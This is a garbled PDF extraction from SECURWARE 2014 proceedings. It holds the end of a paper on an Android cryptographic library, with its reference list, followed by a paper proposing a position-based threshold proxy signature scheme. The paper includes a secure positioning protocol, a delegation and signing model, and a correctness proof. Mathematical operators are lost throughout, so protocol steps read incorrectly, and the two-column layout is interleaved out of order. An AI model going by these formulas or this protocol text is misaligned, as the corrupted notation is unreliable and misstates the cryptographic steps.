Mobile Environments – TSAM", granted by the Fund for
Technological Development of Telecommunications –
FUNTTEL – of the Brazilian Ministry of Communications,
through Agreement Nr. 01.11. 0028.00 with the Financier of
Studies and Projects - FINEP / MCTI.
REFERENCES
[1]
[2]
[3]
[4]
[5]
[6]
[7]
[8]
[9]
[10]
CONCLUDING REMARKS
This paper discussed implementation issues on the
construction of a cryptographic library for Android
smartphones. The library actually consists of both standard
and non-standard cryptographic algorithms. Performance
measurements were taken in order to compare CSP with
other cryptographic providers. Despite all difficulties for
obtain realistic data, experiments have shown that standard
CSP can be competitive to other implementations. On the
other hand, non-standard cryptography has shown low
performance that can possibly inhibit its use in real time
applications. However, their value consists in offering secure
alternatives to possibly compromised standards. Future work
will focus on correctness, security (particularly in the context
of side channel attacks) and performance optimization.
Correctness of implementation in the absence of formal
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
[11]
[12]
[13]
[14]
[15]
A. Braga and E. Nascimento, Portability evaluation of cryptographic
libraries on android smartphones. In Proceedings of the 4th
international conference on Cyberspace Safety and Security (CSS'12),
Yang Xiang, Javier Lopez, C.-C. Jay Kuo, and Wanlei Zhou (Eds.).
Springer-Verlag, Berlin, Heidelberg, 2012, pp. 459-469.
A. Braga, Integrated Technologies for Communication Security on
Mobile Devices. In MOBILITY, The Third International Conference
on Mobile Services, Resources, and Users, 2013, pp. 47-51.
B. Kaliski, RFC 2898. PKCS #5: Password-Based Cryptography
Specification
Version
2.0.
Available
in:
http://tools.ietf.org/html/rfc2898.
B. O'Higgins and W. Diffie and L. Strawczynski, R. do Hoog,
Encryption and ISDN - A Natural Fit, 1987 International Switching
Symposium (ISS87), 1987.
D. Aranha and C. Gouvêa, RELIC, RELIC is an Efficient LIbrary for
Cryptography, Available in: http://code.google.com/p/relic-toolkit.
D. Boneh and B. Lynn and H. Shacham, Short signatures from the
Weil pairing. J. Cryptology, Extended abstract in Proceedings of
Asiacrypt 2001, Sept. 2004, 17(4): pp. 297–319.
D.
Bornstain,
Dalvik,
VM
Internals.
Available
in:
http://sites.google.com/site/io/dalvik-vm-internals.
D. Hankerson and S. Vanstone and A. Menezes, Guide to elliptic
curve cryptography, Springer-Verlag New York, Inc., Secaucus, NJ,
USA, 2003.
D. J. Bernstein, The Salsa20 family of stream ciphers. Available in:
http://cr.yp.to/papers.html#salsafamily.
Ergonomics in the 5.0 Java Virtual Machine. Available in:
http://www.oracle.com/technetwork/java/ergo5-140223.html
F. Zhang and R. Safavi-Nainia and W. Susilo, An Efficient Signature
Scheme from Bilinear Pairings and Its Applications., in F. Bao and
R. H. Deng and J. Zhou, ed., Public Key Cryptography, Springer,
2004, pp. 277-290.
G. Anthes, “French team invents faster code-breaking algorithm”,
Communications of the ACM, v. 57,n. 1, January 2014, pp. 21-23.
H. Oh and B. Kim and H. Choi and S. Moon, Evaluation of Android
Dalvik virtual machine. In Proceedings of the 10th International
Workshop on Java Technologies for Real-time and Embedded
Systems (JTRES '12), ACM, New York, NY, USA, 2012, pp. 115124.
How to Implement a Provider in the Java Cryptography Architecture.
Available
in:
http://docs.oracle.com/javase/7/docs/technotes/guides/security/crypto/
HowToImplAProvider.html.
J. Bos and D. Osvik and D. Stefan, Fast Implementations of AES on
Various
Platforms,
2009.
Available
in
http://eprint.iacr.org/2009/501.pdf.
149
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
[16] J. Menn, Experts report potential software "back doors" in U.S.
standards.
Available
in:
http://www.reuters.com/article
/2014/07/15/usa-nsa-software-idUSL2N0PP2BM20140715?irpc=932.
[17] Java Cryptography Architecture Oracle Providers Documentation for
Java
Platform
Standard
Edition
7.
Available
in:
http://docs.oracle.com/javase/7/docs/technotes/guides/security/SunPr
oviders.html.
[18] Java Cryptography Architecture Standard Algorithm Name
Documentation for Java Platform Standard Edition 7. Available in:
http://docs.oracle.com/javase/7/docs/technotes/guides/security/Standa
rdNames.html.
[19] Java Cryptography Extension Unlimited Strength Jurisdiction Policy
Files
7
Download.
Available
in:
http://www.oracle.com/technetwork/pt/java/javase/downloads/jce-7download-432124.html.
[20] Java™ Cryptography Architecture (JCA) Reference Guide. Available
in:
http://docs.oracle.com/javase/7/docs/technotes/guides/
security/crypto/CryptoSpec.html.
[21] NIST FIPS PUB 186-2, Digital Signature Standard (DSS). Available
in:
http://csrc.nist.gov/publications/fips/archive/fips186-2/fips1862.pdf.
[22] NIST FIPS-PUB-180-4. Secure Hash Standard (SHS). Available in:
http://csrc.nist.gov/publications/fips/fips180-4/fips-180-4.pdf, March
2012.
[23] NIST FIPS-PUB-186. Digital Signature Standard (DSS). Available
in:
http://csrc.nist.gov/publications/fips/archive/fips186-2/fips1862.pdf.
[24] NIST FIPS-PUB-197. Announcing the ADVANCED ENCRYPTION
STANDARD (AES). Federal Information Processing Standards
Publication 197 November 26, 2001.
[25] NIST FIPS-PUB-198. The Keyed-Hash Message Authentication
Code
(HMAC).
Available
in:
http://csrc.nist.gov/publications/fips/fips198/fips-198a.pdf.
[26] NIST Removes Cryptography Algorithm from Random Number
Generator
Recommendations.
Available
in:
http://www.nist.gov/itl/csd/sp800-90-042114.cfm.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
[27] NIST SP 800-38A. Recommendation for Block Cipher Modes of
Operation.
2001.
Available
in:
http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf.
[28] NIST SP 800-38D. Recommendation for Block Cipher Modes of
Operation: Galois/Counter Mode (GCM) and GMAC. 2007.
Available in: http://csrc.nist.gov/publications/nistpubs/800-38D/SP800-38D.pdf.
[29] Paulo Barreto’s AES Public Domain Implementation in Java.
Available in: www.larc.usp.br/~pbarreto/JAES.zip.
[30] R. Barbulescu, P. Gaudrey, A. Joux,, and E. Thomé, “A quasipolynomial algorithm for discrete logarithm in finite fields of small
characteristic”,
June
2013,
preprint
available
at
http://eprint.iacr.org/2013/400.pdf.
[31] SERPENT, A Candidate Block Cipher for the Advanced Encryption
Standard. Available in: www.cl.cam.ac.uk/~rja14/serpent.html.
[32] SHA-3 proposal BLAKE. Available in: https://131002.net/blake.
[33] SpongyCastle, Spongy Castle: Repackage of Bouncy Castle for
Android,
Bouncy
Castle
Project.
Available
in:
http://rtyley.github.com/spongycastle/, 2012.
[34] T. St. Denis and S. Johnson, Cryptography for Developers. Syngress,
2006.
[35] The Java HotSpot Performance Engine Architecture. Available in:
www.oracle.com/technetwork/java/whitepaper-135217.html.
[36] The Legion of the Bouncy Castle. Legion of the Bouncy Castle Java
cryptography APIs. Available in: www.bouncycastle.org/java.html.
[37] Tuning Garbage Collection with the 5.0 Java Virtual Machine.
Available in: http://www.oracle.com/technetwork/ java/gc-tuning-5138395.html.
[38] W. Diffie and M. Hellman, New Directions in Cryptography, IEEE
Trans. on Inf. Theory, vol. 22, no. 6, Nov. 1976, pp. 644-654.
[39] W. Diffie and P. C. van Oorschot, M. J. Wiener, Authentication and
Authenticated Key Exchanges, Designs, Codes and Cryptography
(Kluwer Academic Publishers) 1992, 2 (2): pp. 107–125.
150
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Threshold Proxy Signature Based on Position
Qingshui Xue
Fengying Li
Dept. of Computer Science and Engineering
Shanghai Jiao Tong University
Shanghai, China
xue-qsh@cs.sjtu.edu.cn
School of Continuous Education
Shanghai Jiao Tong University
Shanghai, China
fyli@sjtu.edu.cn
zfcao@cs.sjtu.edu.cn
Zhenfu Cao
Dept. of Computer Science and Engineering
Shanghai Jiao Tong University
Shanghai, China
Abstract—Position-based cryptography has attracted lots of
researchers’ attention. In the mobile Internet, there are many
position-based security applications. For the first time, one new
conception, threshold proxy signature based on positions is
proposed. Based on one secure positioning protocol, one model
of threshold proxy signature based on positions is proposed. In
the model, positioning protocols are bound to threshold proxy
signature tightly, not loosely. Further, one position-based
threshold proxy signature scheme is designed, its correctness is
proved, and its security is analyzed. As far as we know, it is the
first threshold proxy signature scheme based on positions.
Keywords-position; threshold proxy
signature; UC security; model; scheme.
signature;
proxy
I.
INTRODUCTION
In the setting of mobile Internet, position services and
position-binding security applications become one key
requirement, especially the latter. Position services include
position inquiring, secure positioning and so forth. Position
inquiring consists of inquiring your own position and
positioning of other entities. The technology of inquiring your
own position has Global Positioning System (GPS) and other
satellite service system. The technology of positioning of
other entities has radar and so on [2]-[6]. As we all know, the
positioning of other entities is more challenging one. Positionbinding security applications such as position-based
encryption and position-based signature and authentication
are increasingly necessary for us. For example, when one
mobile user sends messages to one specific position, which is
one either physical address or logical address (such as Internet
Protocol address), it is desirable for us that only the user who
is at that address or has been at that address can receive and
decrypt messages encrypted. Even if other mobile users at that
position receive messages, but they can’t decrypt them. Or the
specified receiver at that position due to some reasons
temporarily leaves his/her position, it will not be able to
receive or decrypt messages any more. In addition, if the
specified receiver at that place moves to another place, and
he/she hopes he/she can receive messages at the new place.
Take one application about position-based signature and
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
authentication as an example. One mobile or fixed user signs
messages at one place and sends them to another mobile user.
The receiver can receive the signed message and verify
whether or not received messaged is indeed signed at the place
by the signer. Even if the signer moves to another address, it
will not affect the receiving and verification of signed
messages.
Currently, the research on position-based cryptography
focuses on secure positioning about which some work had
been proposed [1]. These positioning protocols are based on
one-dimension, two-dimension or three-dimension spaces,
including traditional wireless network settings [1], as well as
quantum setting [7]-[9]. It seems to us that position-based
cryptography should integrate secure positioning with
cryptographic primitives. If only or too much concentrating
on positioning protocols, perhaps we will be far away from
position-based cryptography. In other words, nowadays
positioning is bound loosely with related security applications,
not tightly, as results in the slow progress of position-based
cryptography and applications. Relying on the thoughts, in the
paper, our main contributions are as follows.
(1)One model of threshold proxy signature based on
positions is proposed. Position-based threshold proxy
signature is one kind of threshold proxy signature, but a novel
one. The definition is given and its model is constructed. In
the meantime, its security properties are defined.
(2)To realize the kind of threshold proxy signature, one
secure-positioning-protocol based threshold proxy signature
scheme is proposed and its security is analyzed as well.
The rest of the paper is organized as follows. In Section
2, the function of positioning and one secure positioning
protocol are introduced. In Section 3, the model and definition
of threshold proxy signature based on positions are
constructed. One position-based threshold proxy signature
scheme is designed in Section 4. The correctness of the
scheme is proved in Section 5. The security of the proposed
scheme will be analyzed in Section 6. Finally, the conclusion
is given.
151
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
II. POSITION PROTOCOLS
In this section, the function of positioning protocols and
one secure positioning protocol are introduced.
A. Function of Positioning Protocols
The goal of positioning protocol is to check whether one
position claimer is really at the position claimed by it.
Generally speaking, in the positioning protocol, there are at
least two participants including position claimers and verifiers,
where the verifiers may be regarded as position infrastructure.
According to destination of the positioning, there are two
kinds of positioning protocol, i.e., your own position
positioning protocol and others’ position positioning protocol.
As of now, lots of work on your own position positioning
protocol have been done [2]-[6]. Nevertheless, research on
others’ positions positioning protocol is far less and there are
still many open questions to resolve. In our model and scheme,
we will make full use of the two varieties of positioning
protocol.
B. One Secure Positioning Protocol
Here, one others’ positions secure positioning protocol is
introduced. Compared with your own position positioning
protocol, others’ positions positioning protocol is more
complex.
In this section, N. Chandran et al.’s secure positioning
protocol in 3-dimensions is reviewed [1], which can be used
in mobile Internet.
In the protocol, 4 verifiers denoted by V1 ,V2 ,...,V4 , which
can output string X i ,are used. The prover claims his/her
position, which is enclosed in the tetrahedron defined by the
4 verifiers. Let t1 ,......, t4 be the time taken for radio waves
to arrive at the point P from verifier V1 ,V2 ,...,V4 respectively.
When we say that V1 ,V2 ,...,V4 broadcast messages such that
they “meet” at P, we mean that they broadcast the messages
at time T t1 , T t2 , T t3 and T t4 respectively so that at
time T all the messages are at position P in space. The
protocol uses a pseudorandom generator namely an ε-secure
PRG :{0,1}n {0,1}m {0,1}m . They select the parameters
such that 2 m is negligible in the security parameters. X i
denotes a string chosen randomly from a reverse block
entropy source. The protocol is given as follows:
Step 1. V1 ,...,V3 and V4 pick keys K1 ,..., K3 and K 4
selected randomly from {0,1}m and broadcast them through
their private channel.
Step 2. For the purpose of enabling the device at P to calculate
K i for 1 i 4 , the verifiers do as follows. V1 broadcasts
key K1 at time T t1 . V2 broadcasts X 1 at time T t2 and
meanwhile broadcasts K2' PRG( X1 , K1 ) K2 . Similarly,
at time T t3 , V3 broadcasts ( X 2 , K3' PRG( X 2 , K2 ) K3 ) ,
and V4 broadcasts ( X 3 , K4' PRG( X 3 , K3 ) K4 ) at time
T t4 .
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Step 3. At time T, the prover at position P calculates messages
Ki'1 PRG( X i , Ki ) Ki 1 for 1 i 3 . Then it sends K 4 to
all verifiers.
Step 4. All verifiers check that the string K 4 is received at
time (T ti ) and that it equals K 4 that they pre-picked. If the
verifications hold, the position claim of the prover is accepted
and it is supposed to be indeed at position P. Otherwise, the
position claim is invalid.
III.
THE MODEL OF POSITION-BASED THRESHOLD PROXY
SIGNATURE
The model, definition and security properties are proposed
in this section.
A. The model
In the model, there are four kinds of participants
including the original signer (OS), the proxy signer group
(PSG), which consists of n proxy signers {PS1 , PS2 ,..., PSn } ,
the verifier (V) and position infrastructure (PI). OS takes
responsibility of confirmation of position of his/her own and
at one position delegates his/her signing power to the proxy
signer group to sign messages at these proxy signers’
positions on behalf of OS. t (t n) or more proxy signers
cooperate to sign one message at their individual positions
after their positions are confirmed by PI and are the same as
the ones in the proxy signing delegation warrant, whereas,
less than t proxy signers can’t. V checks that the proxy
signature is generated by the actual proxy signers at their
individual positions on behalf of OS. PI, which is one trusted
third party, is used to provide position services for the related
parties. The model is illustrated in Figure 1.
OS
PI
PSG(n,m)
V
Figure 1. Model of position-based threshold proxy signature.
B. Definition
Position-based threshold proxy signature.
Simply speaking, the kind of proxy signature combines
proxy signature, threshold proxy signature and positioning
protocols as one single scheme. It is mainly composed of
three modules of threshold proxy signing power delegation,
threshold proxy signing and threshold proxy signature
verifying. In the module of threshold proxy signing power
delegation, OS first sends one request to PI for the purpose of
delegating signing power to PSG. Then PI runs one
positioning protocol to confirm OS and the proxy signers’
positions. If their positions are valid, PI sends acknowledge
to OS and the proxy signers. After that, PI produces proxy
signing key packages for individual proxy signers and sends
them to each proxy signer. OS produces proxy delegation
warrant to all proxy signers. In the module of threshold proxy
152
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
OS and all proxy signers by running positioning protocol with
OS and PS. If OS and all proxy signers’ positions are valid,
PI sends the acknowledgment to OS. According to the
acknowledgment from PI, OS generates delegation warrant
dw and sends it to each proxy signer PSi (i 1, 2,..., n) . At
the same time, PI produces proxy signing key package pskpi
for PSi (i 1,2,..., n) . dw contains OS and all proxy
signers’ identities and positions, n, t (threshold value),
message types to sign, expiry date and so forth. pskpi
encapsulates positioning protocol, proxy signing key, the
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
i th
proxy signer’s identity IDPSi and position PosPSi , signing
algorithm, etc.
PropTProxySign. Before the proxy signer group wants to
sign the message m on behalf of OS, actual proxy signer
PSi
(i 1 , 2 , k. . t., k, n (here, assume that PSi
(i 1, 2,..., k ) are the proxy signers participating in the
signing, denoted by aps )first executes individual proxy
signing key package pskpi to run positioning protocol to
confirm the validity of his/her position PosPSi with PI. If
his/her current position PosPSi is identical to the one in the
delegation warrant dw , he/she is able to use proxy signing
key package pskpi to sign the message m for only once and
sends
corresponding
individual
proxy
signature
(m, si , dw, pp) to the Clerk, who collects and verifies
individual signatures, and generates final threshold proxy
signature. The Clerk checks the validity of individual
signature si by using the identity IDPSi and position PosPSi
of PSi and corresponding verification algorithm. If the
number of the actual proxy signers k is equal to or more than
t , and less than or equal to n , and k individual signatures
are valid, the Clerk will generate the final threshold proxy
signature (m, s, dw, asp, pp ) and send it to V. Here, simply
denote s by s si .
k
i 1
PropTProxyVerify. After receiving the threshold proxy
signature (m, s, dw, asp, pp) from the proxy signer group, V
takes as input the identities IDOS , IDPS1 , IDPS2 ,..., IDPSn ,
positions PosOS , PosPS1 , PosPS2 ,..., PosPSn , asp and pp to
check whether or not s is the threshold proxy signature on
the message m by using corresponding threshold proxy
signature verification algorithm. If it holds, V can be sure that
the message m was signed by actual proxy signers PSi
(i 1, 2,..., k ) at position PosPSi (i 1, 2,..., k ) on behalf of
OS who delegated his/her signing power to the proxy signer
group at the position PosOS .
1.Initialization
OS
2.3 PropTProxyDelegage
signing, each proxy signer who wants to actually attend to
sign has to first check that his/her position is at the designated
position, which is specified in the proxy delegation warrant.
If it holds, each actual proxy signer can use his/her proxy
signing key package to sign the message for only once and
sends individual proxy signature to one clerk who collects all
individual signatures and generates final threshold proxy
signature. In the module of threshold proxy signature
verifying, V uses OS and all proxy signers’ identities and
positions to check the validity of threshold proxy signatures
based on positions.
Remark 1. During the module of threshold proxy signing
power delegation, if OS and all of proxy signers don’t run
positioning protocols with PI to confirm their own positions,
OS is unable to delegate his/her signing power to the proxy
signer group. Moreover, if neither OS nor each proxy signer
can confirm its position with PI, OS can’t fulfill his
delegation of signing power. In the module of threshold proxy
signing, if each of proxy signers doesn’t perform positioning
protocols to check the validity of his/her position, he/she is
not able to generate individual proxy signature by individual
proxy signature key package. That’s to say, before the proxy
signer group wants to sign one message on behalf of OS, each
member has to confirm its position. Even if each proxy signer
passes individual position’s confirmation, he/she can sign one
message for only once. During the module of threshold
signature verifying, it is unnecessary for the verifier to
confirm OS and all proxy signers’ positions.
In the model, it will be seen that we regard the three
modules as three primitives. Therefore, in our model, the
positioning protocol is bound tightly with the delegation of
signing power and threshold proxy signature generation,
instead loosely.
Thus, in the model, the positioning-based threshold proxy
signature is composed of four primitives:Initialization,
PropTProxyDelegate,
PropTProxySign
and
PropTProxyVerify.
Initialization. PI takes as input secure parameter 1k and
outputs system master key mk and public parameter pp , in
the meantime, the system distributes user identity IDi for
user i .
PropTProxyDelegate. When OS wants to delegate his/her
signing power to the proxy signer group, OS first sends
his/her requests to PI. After PI gets OS’s request, PI checks
the validity of positions PosOS , PosPS1 , PosPS2 ,..., PosPSn of
PSG(n,m)
2.1 PropTProxyDelegage
PI
n
tio
e
liza
gag ign
itia Dele
n
I
y
xyS
1.
x
o
o
r
P
Pr
pT
opT
Pro .1 Pr
3
2.2
3.2 PropTProxySign
V
4 PropTProxyVerify
Figure 2. Position-based threshold proxy signature.
153
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
The model is illustrated in Figure 2.
C. Security Properties of Position-Based Threshold Proxy
Signature
Besides security properties of threshold proxy signature,
this kind of threshold proxy signature has the security
properties as follows.
(1) Positioning protocol binding. In the module of
PropTProxyDelegate, without confirming of positions of OS
and all proxy signers by running positioning protocol with PI,
OS is unable to fulfill his/her delegation of signing power. In
addition, the proxy signing key package of each proxy signer
produced by PI is tightly bound with positioning protocol, as
means that if all of proxy signers want to use proxy signing
key packages, each of them has to run positioning protocol
with PI. In the module of PropTProxySign, if the proxy signer
group needs to sign one message on behalf of OS, in order to
get the proxy signing key (implicitly), each of proxy signers
has to make use of individual proxy signing key package to
run positioning protocol with PI. If each of proxy signers is
indeed at the position specified in the delegation warrant dw ,
he/she will be able to obtain (implicitly) the proxy signing
key to sign one message for once only. Actually, each of
proxy signers can’t get real individual proxy signing key,
which is encapsulated in the proxy signing key package.
Remark 2. In the model, for each time, if the proxy
signers want to cooperate to sign messages on behalf of OS,
each of them has to run positioning protocol with PI to
confirm the validity of individual positions. One maybe
thinks we should make use of one-time digital signing
algorithm or one-time signing private key. In fact, in the
model, using one-time signing key is optional. On one hand,
if the model uses fixed signed private key encapsulated in the
proxy signing key package, each of proxy signers can’t use it
at will and can sign one message for only once. If the proxy
signer group wants to sign another message, all of them still
need to communicate with PI once again. In the sense, each
of proxy signers actually has no the knowledge of its own
proxy signing private key. On the other hand, if one-time
signing private keys are used in the model, it is reasonable.
That is to say, for each time, each proxy signing key package
will release one random proxy signing key. In addition,
because position-based applications are closely related with
position instant authentication or confirmation, we think that
position-based cryptography should be deeply researched
with respect to online cryptography, which focuses on instant
cryptographic algorithms and security processing. Of course,
in the eyes of ours, it is one open question as well.
IV.
ONE POSITION-BASED THRESHOLD PROXY
SIGNATURE SCHEME
In this section, one position-based threshold proxy
signature scheme, in which there exist one original signer and
n proxy signers, is proposed. The scheme mainly includes
four kinds of participants:the original signer (still denoted as
OS), the proxy signer group (PSG) PSG {PS1 , PS2 ,..., PSn } ,
the verifier (V) and PI. PI will make use of the secure
positioning protocol mentioned in Section 2.2 to provide
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
services of position for the original signer and n proxy
signers. In addition, PI will be regarded as the trusted third
party and system authority. The scheme is composed of four
primitives:Initialization,
PropTProxyDelegate,
PropTProxySign and PropTProxyVerify. As primitives, it
means that they either fully run or do nothing. The four
primitives are detailed as follows.
A. Initialization
PI takes as input secure parameter 1k and outputs system
master key mk and public parameter pp , at the same time,
PI distributes user identity IDi for user i . Here, rewrite the
primitive as Initialization (k , mk , pp) .
B. PropTProxyDelegation
Step 1. The original signer sends his/her requests
( IDOS , PosOS , IDPS1 , PosPS1 , IDPS2 , PosPS2 ,..., IDPSn , PosPSn ,
reqdeleg ) of delegating signing power to the proxy signer
group to PI.
Step 2. After PI gets OS’s request, PI checks the validity of
the positions PosOS , PosPS1 , PosPS2 ,..., PosPSn of OS and all
proxy signers by running positioning protocol with OS and
each proxy signer.
Step 3. If OS and all proxy signers’ positions
PosOS , PosPS1 , PosPS2 ,..., PosPSn are valid, as means that OS is
indeed at the position PosOS and PosPSi is one valid position
of PSi (i 1, 2,..., n) , PI sends the acknowledgement
( IDOS , PosOS , IDPS1 , PosPS1 , IDPS2 , PosPS2 ,..., IDPSn , PosPSn ,
ackdeleg )
to
OS;
otherwise
PI
sends
( IDOS , PosOS , IDPS1 , PosPS1 , IDPS2 , PosPS2 ,..., IDPSn , PosPSn ,
rejdeleg ) to OS.
Step
4.
If
OS
receives
( IDOS , PosOS , IDPS1 , PosPS1 ,
IDPS2 , PosPS2 ,..., IDPSn , PosPSn , ackdeleg ) from
PI,
he/she
generates
delegation
warrant
dw( IDOS , PosOS , IDPS1 , PosPS1 , IDPS2 , PosPS2 ,..., IDPSn , PosPSn ,
SignOS ( IDOS , PosOS , IDPS1 , PosPS1 , IDPS2 , PosPS2 ,..., IDPSn ,
PosPSn ))
where
SignOS ( IDOS , PosOS , IDPS1 , PosPS1 ,
IDPS2 , PosPS2 ,..., IDPSn , PosPSn ) is the digital signature on
( IDOS , PosOS , IDPS1 , PosPS1 , IDPS2 , PosPS2 ,..., IDPSn , PosPSn )
generated by OS, and sends it to each proxy signer.
Step 5. PI produces proxy signing key package pskpi for
each proxy signer and sends it to PSi (i 1, 2,..., n) . pskpi
encapsulates positioning protocol, proxy signing key, signing
algorithm, the identity and position of PSi , etc. Anyone
wanting to use proxy signing key and signing algorithm in
pskpi has to run the proxy signing key package pskpi .
154
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
C. PropTProxySign
Step 1. When the proxy signer group wants to sign the
message m on behalf of OS, each actual proxy signer PSi
(i 1, 2,..., k , t k n) (here, assume that PSi (i 1, 2,..., k )
are the actual proxy signers, denoted by asp )runs proxy
signing key package pskpi for executing positioning
protocol to confirm the validity of his/her position PosPSi
with PI.
Step 2. If PSi ' s current position PosPSi is identical to the
one in the delegation warrant dw , proxy signing key package
pskpi prompts PSi to input the message m to pskpi . Thus
proxy signing key package pskpi produces the individual
proxy signature si and send it to the Clerk; if PS’s current
position PosPSi is not identical to the one in the delegation
warrant dw , PSi is unable to perform the function of proxy
signing and stops (i 1, 2,..., k ) .
Step 3. After the Clerk receives the individual proxy
signature si , he/she checks si is the individual proxy
signature by using verification algorithm, the identity and
position of PSi (i 1, 2,..., k ) .
Step 4. If all si ' s verification hold, the Clerk generates the
final threshold proxy signature s by processing all
individual proxy signatures si (i 1,2,.., ) t . Here, simply
denote s by s si .
k
i 1
Step 5. The clerk sends (m, s, dw, aps, pp) to the proxy
signature verifier V.
D. PropTProxyVerify
Step 1. After receiving the threshold proxy signature
(m, s, dw, aps, pp) , V takes as input the identities
IDOS , IDPS1 , IDPS2 ,..., IDPSn , positions PosOS , PosPS1 , PosPS2 ,
..., PosPSn from dw and pp to check that the proxy
delegation warrant dw is valid. If it is valid, the scheme
continues, or V fails to stop.
Step
2.
V
takes
as
input
the identities
IDOS , IDPS1 , IDPS2 ,..., IDPSn , positions PosOS , PosPS1 , PosPS2 ,
..., PosPSn from dw , aps and pp to check whether or not s
V. CORRECTION OF THE ABOVE SCHEME
In fact, the proof of correctness of above scheme is simple.
The following theorem about it is given.
Theorem 1:If the scheme accurately and sequentially runs
according to the primitives above, the verifier V can confirm
that the threshold proxy signature is generated by the actually
proxy signers asp at individual
position PosPSi
(i 1, 2,..., k ) on behalf of the original signer OS who at the
position PosOS delegates his/her signing power to the group
of proxy signers, and all proxy signers.
Proof.
In the primitive of PropTProxyDelegation, PI checks the
validity of positions PosOS , PosPS1 , PosPS2 ,..., PosPSn of OS
and all proxy signers by running positioning protocol with
OS and each proxy signer. If all of positions are valid, as
means that OS is actually at the position PosOS and PosPSi is
one valid position of PSi (i 1,2,..., n) , PI sends the
acknowledgement ( IDOS , PosOS , IDPS1 , PosPS1 , IDPS2 , PosPS2 ,
..., IDPSn , PosPSn , ackdeleg ) to OS. Then OS can generates
delegation warrant dw( IDOS , PosOS , IDPS1 , PosPS1 , IDPS2 ,
PosPS2 ,..., IDPSn , PosPSn , SignOS ( IDOS , PosOS , IDPS1 , PosPS1 ,
IDPS2 , PosPS2 ,..., IDPSn , PosPSn )) and sends it to each proxy
signer. At the same time, OS produces proxy signing key
package pskpi for each proxy signer and sends it to PSi ' s
(i 1, 2,..., n) . In the primitive of PropTProxySign, when the
proxy signer group wants to sign the message m on behalf of
OS, the actual proxy signers PSi (i 1, 2,..., k ) runs proxy
signing key package pskpi for executing positioning protocol
to confirm the validity of his/her position PosPSi with PI. If
PSi ' s current position PosPSi is identical to the one in the
delegation warrant dw , proxy signing key package pskpi
prompts PSi to input the message m to pskpi . Thus proxy
signing key package pskpi produces the individual proxy
signature si and sends it to the Clerk. After the Clerk
receives the individual proxy signatures si , he/she checks
si is the individual proxy signature by using verification
algorithms, the identities and positions of PSi (i 1, 2,..., k ) .
is the threshold proxy signature on the message m , and
t k n . If it holds, V can be sure that the message m was
signed by actual proxy signers at individual position PosPSi
If all si ' s verification hold, the Clerk generates the final
threshold proxy signature s by processing all individual
proxy signatures si (i 1, 2,..., k ) . Finally, the Clerk sends
(i 1, 2,..., n) , and all proxy signers.
(m, s, dw, asp, pp) to the proxy signature verifier V. In the
primitive of PropTProxyVerify, V takes as input the identities
IDOS , IDPS1 , IDPS2 ,..., IDPSn , positions PosOS , PosPS1 , PosPS2 ,
(i 1, 2,..., k ) on behalf of OS who delegated his/her signing
power to the all proxy signers at the position PosPSi
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
..., PosPSn from dw and pp to check that the proxy delegation
155
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
warrant dw is valid. Next, V takes as input the identities
IDOS , IDPS1 , IDPS2 ,..., IDPSn , positions PosOS , PosPS1 , PosPS2 ,
..., PosPSn from dw , asp and pp to check whether or not s
is the threshold proxy signature on the message m . If it holds,
V can be sure that the message m was signed by the actual
proxy signers at individual position PosPSi (i 1, 2,..., k ) on
behalf of OS who delegated his/her signing power to all
proxy signers at the position PosPSi (i 1, 2,..., k ) , and all
proxy signers. Thus, it is proved.
VI.
□
based threshold proxy signature scheme is proposed and
analyze its security. We will further improve relevant models
and schemes. It is believed by us that the research on
positioning-protocol-based cryptographic models or schemes
will become one focus in the setting of the mobile Internet.
ACKNOWLEDGMENT
I would like to thank so many anonymous reviewers for
their advices of modification and improvements. In addition,
this paper is supported by NSFC under Grant No. 61170227,
Ministry of Education Fund under Grant No. 14YJA880033,
and Shanghai Projects under Grant No. 2013BTQ001,
XZ201301 and 2013001.
SECURITY ANALYSIS OF THE PROPOSED SCHEME
In the proposed scheme, three sorts of technology, i.e.,
secure positioning protocol including others’ positions
positioning protocol and your own position positioning,
proxy signature and threshold proxy signature, are used. That
means, the security of the proposed scheme depends on the
security of used three kinds of technology. Because the
proposed scheme or the model is one component framework,
it is proper that its security is analyzed by the Universal
Composition (UC) framework [10]. That is, by constructing
the components of proxy signature model, digital signature
model and positioning protocol model, and attack modeling
from internal attackers, external attackers and conspiracy
attackers, the security analysis of the above scheme can be
made. The internal attackers are from the original signer and
proxy signers; the external attackers can be any software
systems or entities; the conspiracy attackers mainly are
among proxy signers, partially between both the original
signer and some malicious proxy signers. By adding these
models into the idealistic environment in UC framework, if
the security of the scheme in the idealistic environment can
be proved secure, its security in the real environment can be
proved as well. Its security analysis will be deeply done in
the further study.
VII. CONCLUSION AND FUTURE WORK
In the paper, according to security requirements of the
mobile Internet, one model of position-based threshold proxy
signature is constructed. Its definition, security properties and
construction are given. As far as we know, it is the first model
of combining positioning protocols, proxy signature and
threshold proxy signature. In the meantime, one position-
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
REFERENCES
N. Chandran, V. Goyal, R. Moriarty, and R. Ostrovsky, “Position
Based Cryptography,” CRYPTO 2009, Aug. 2009, pp. 391-407, doi:
10.1007/978-3-642-03356-8_23.
[2] S.M. Bilal, C.J. Bernardos, and C. Guerrero, “Position-based routing
in vehicular networks: A survey,” Journal of Network and Computer
Applications, vol. 36, Feb. 2013, pp. 685-697, doi: doi:
10.1016/j.jnca.2012.12.023.
[3] D. Singelee and B. Preneel, “Location verification using secure
distance bounding protocols,” IEEE Conference on Mobile Adhoc and
Sensor Systems Conference, Nov. 2005, pp. -840 doi:
10.1109/MAHSS.2005.1542879.
